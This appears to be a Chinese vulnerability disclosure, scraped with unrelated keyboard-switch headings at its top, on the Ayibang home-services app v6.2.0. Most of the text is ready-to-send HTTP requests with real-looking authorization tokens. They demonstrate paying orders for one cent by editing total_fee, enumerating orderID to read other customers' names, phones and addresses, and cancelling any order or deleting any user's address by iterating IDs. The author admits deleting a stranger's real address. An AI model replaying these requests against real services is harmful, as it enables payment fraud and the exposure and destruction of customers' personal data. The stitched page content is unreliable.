阿姨帮的android+代码,阿姨帮最新APP漏洞大全(支付漏洞/地址/订单遍历/删除等)...

8种机械键盘轴体对比

本人程序员，要买一个写代码的键盘，请问红轴和茶轴怎么选？

危害：看文章自己脑补

漏洞等级：高

提交时间： 2016-02-02 12:45

简要描述：

阿姨帮最新版APP(v6.2.0)漏洞打包

详细说明：

支付漏洞

1. 超低价格支付订单

点击首页，随便选择一项服务并下订单

2. 点击确认支付抓包并先截断提交：1

2

3

4

5

6

7

8

9

10

11

12POST https://api-cust.ayibang.com/v1/pay/wx/sign HTTP/1.1

User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}

Authorization: 30f6188161eb1a0bc7d245c49c01a208bb3cee34

Network: WiFi

City: beijing

Timestamp: 1452845167007

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Host: api-cust.ayibang.com

Connection: Keep-Alive

Accept-Encoding: gzip

Content-Length: 128

out_trade_no=11291191&attach=0_1_13800000000_0&body=%E9%98%BF%E5%A7%A8%E5%B8%AE%E6%94%AF%E4%BB%98&total_fee=5000&trade_type=AP

将上面的total_fee的值改为1，提交

支付成功后订单成为待确认状态，说明支付成功

任意用户订单查看

点击我们刚生成的订单，系统访问如下地址：1

2

3

4

5

6

7

8

9GET https://api-cust.ayibang.com/v1/order/detail?orderID=11291191 HTTP/1.1

User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}

Authorization: 30f6188161eb1a0bc7d245c49c01a208bb3cee34

Network: WiFi

City: beijing

Timestamp: 1452845324989

Host: api-cust.ayibang.com

Connection: Keep-Alive

Accept-Encoding: gzip

orderID=11291191处可遍历，burp出手对订单的后四位遍历

N多订单信息可看

以订单ID为11290071为例，可查看到该订单涉及用户的姓名 手机号 住址等

任意用户订单取消漏洞

点击之前的订单，点击取消订单，会抓到如下请求包:

1

2

3

4

5

6

7

8

9

10

11

12POST https://api-cust.ayibang.com/v1/order/cancel HTTP/1.1

User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}

Authorization: 30f6188161eb1a0bc7d245c49c01a208bb3cee34

Network: WiFi

City: beijing

Timestamp: 1452846770206

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Host: api-cust.ayibang.com

Connection: Keep-Alive

Accept-Encoding: gzip

Content-Length: 42

data=%7B%22orderID%22%3A%2211291191%22%7D&post处内容url解码后为：{“orderID”:”11291191”}通过遍历orderID可删除所有订单

通过另一手机注册一个账号并下一个订单

抓包查得该订单ID为11292401

提交以下数据包：1

2

3

4

5

6

7

8

9

10

11

12POST https://api-cust.ayibang.com/v1/order/cancel HTTP/1.1

User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}

Authorization: 30f6188161eb1a0bc7d245c49c01a208bb3cee34

Network: WiFi

City: beijing

Timestamp: 1452846770206

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Host: api-cust.ayibang.com

Connection: Keep-Alive

Accept-Encoding: gzip

Content-Length: 42

data=%7B%22orderID%22%3A%2211292401%22%7D&

成功取消订单

再查看该用户订单列表，已经成为空：

任意用户服务地址删除

1. 点击app里面服务地址

2. 添加两个地址

然后删除上面的两个地址，并抓包1

2

3

4

5

6

7

8

9GET https://api-cust.ayibang.com/v1/house/delete?houseID=17334752 HTTP/1.1

User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}

Authorization: 211ebac721824b5cb688e3c6d1187bc21beff557

Network: WiFi

City: nanjing

Timestamp: 1452841496773

Host: api-cust.ayibang.com

Connection: Keep-Alive

Accept-Encoding: gzip

返回数据包如下：

1

2

3

4

5

6

7

8HTTP/1.1 200 OK

Server: nginx

Date: Fri, 15 Jan 2016 07:04:57 GMT

Content-Type: application/json

Connection: close

X-Powered-By: PHP/5.6.11

Content-Length: 628

{"house":{"id":"17334752","custID":"16989352","city":"nanjing","cityName":"u5357u4eac","zone":"null","nameAddr":"u5b9eu9a8c

上面内容解码后如下：

可以看到statusName处标记为已删除，并且数据包返回的ID与删除的ID为同一ID：17334752

再删除另外一个地址：

1

2

3

4

5

6

7

8

9GET https://api-cust.ayibang.com/v1/house/delete?houseID=17336562 HTTP/1.1

User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}

Authorization: 211ebac721824b5cb688e3c6d1187bc21beff557

Network: WiFi

City: nanjing

Timestamp: 1452841783577

Host: api-cust.ayibang.com

Connection: Keep-Alive

Accept-Encoding: gzip由此可看到系统删除服务地址是根据不同的ID来实现的，虽然数字不是连续的，但是经过几次尝试发现都是以17开头的8位数字，如此遍可以通过遍历id删除其它用户的服务地址

只需提交以下数据包：

1

2

3GET https://api-cust.ayibang.com/v1/house/delete?houseID=17336562 HTTP/1.1

User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}

Authorization: 211ebac721824b5cb688e3c6d1187bc21beff557

通过burpsuite 遍历houseID处，即可删除所有用户收获地址

以下为我随便找的一个用户地址(抱歉给这位用户带来困扰)：

1

2

3

4

5

6

7

8

9

10GET https://api-cust.ayibang.com/v1/house/delete?houseID=17330512 HTTP/1.1

Host: api-cust.ayibang.com

Connection: keep-alive

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36 OPR/34.0.2036.47

DNT: 1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: zh-CN,zh;q=0.8

返回：

漏洞证明

如果需要通过浏览器复现上面问题，需要注意数据请求处有一个请求头：

Authorization: 211ebac721824b5cb688e3c6d1187bc21beff557

此处的authorization是用户在登录APP的时候服务器返回的认证key